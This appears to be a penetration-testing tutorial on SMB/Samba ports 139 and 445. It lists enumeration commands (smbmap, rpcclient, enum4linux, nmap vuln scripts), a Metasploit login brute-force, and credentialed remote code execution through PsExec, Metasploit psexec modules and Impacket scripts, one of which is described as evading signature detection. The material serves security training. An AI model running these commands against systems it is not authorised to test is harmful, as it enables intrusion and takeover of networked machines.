Port 139 and 445- SMB/Samba

How to enumerate port 139/445 (SMB)

0

Samba is a service that allows the user to share files with other computers. It has interoperability, which means that it can share stuff between Linux and Windows systems. A windows user will simply see an icon for a folder that includes some files. Even though the folder and files actually exist on a Linux-server.

Enumerate Hostname:

collects NetBIOS over TCP/IP client used to lookup NetBIOS names.

nmblookup -A 192.168.1.101

List Shares:

smbmap -H 192.168.1.101

nmap --script smb-enum-shares -p 139,445 192.168.1.101

Check for Null Sessions:

smbmap -H 192.168.1.101

# A tool to execute client side MS-RPC functions ((-U "" - null session )(-N - no password))
rpcclient -U "" -N 192.168.1.101

#An ftp-like client to access SMB shares
smbclient -L 192.168.1.101
smbclient \\\\192.168.1.101\\[share name]

Nmap scan for Vulnerabilities:

nmap --script smb-vuln* -p 139,445 192.168.1.101

Overall Scan:

Enumerates various smb functions such as :

  • output similar to nmblookup
  • check for null session
  • listing of shares
  • domain info
  • password policy
  • RID cycling output
enum4linux -a 192.168.1.101

Detect SMB version (Metasploit):

msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.101:139 - Host could not be identified: Unix (Samba 2.2.1a)

SMB brute force:

This module will test a SMB login on a range of machines and report successful logins.

use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhosts 192.168.1.101
msf exploit (smb_login)>set user_file /root/Desktop/users.txt
msf exploit (smb_login)>set pass_file /root/Desktop/passwords.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit

Connectin with PSExec:

Psexec.exe is software that helps us to access other machines in a network. This software directly takes us to the shell of the remote PC with the advantage of doing nothing manually. Download this software from –> http://download.sysinternals.com/files/PSTools.zip.

#After extracting the file do the following:
PsExec.exe \\192.168.1.101 -u administrator -p [email protected] cmd

Connectin with PSExec (Metasploit):

If you have SMB credentials you can use psexec to easily log in. You can either use the standalone binary or the metasploit module.

Windows Authenticated User Code Execution:

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals.

msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass [email protected]
msf exploit(windows/smb/psexec) > exploit

Windows Authenticated Powershell Command Execution:

This module uses a valid administrator username and password to execute a PowerShell payload using a similar method to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. By using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection.

msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass [email protected]
msf exploit(windows/smb/psexec_psh) > exploit

Connectin with PSExec (Python):

Impacket for Psexec.py:

Psexec.py lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.

git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples
python psexec.py SERVER/Administrator:[email protected]

Impacket for Atexec.py:

This tool executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

git clone https://github.com/CoreSecurity/impacket.git 
cd impacket/ 
python setup.py install 
cd examples

python atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo

 

Leave A Reply

Your email address will not be published.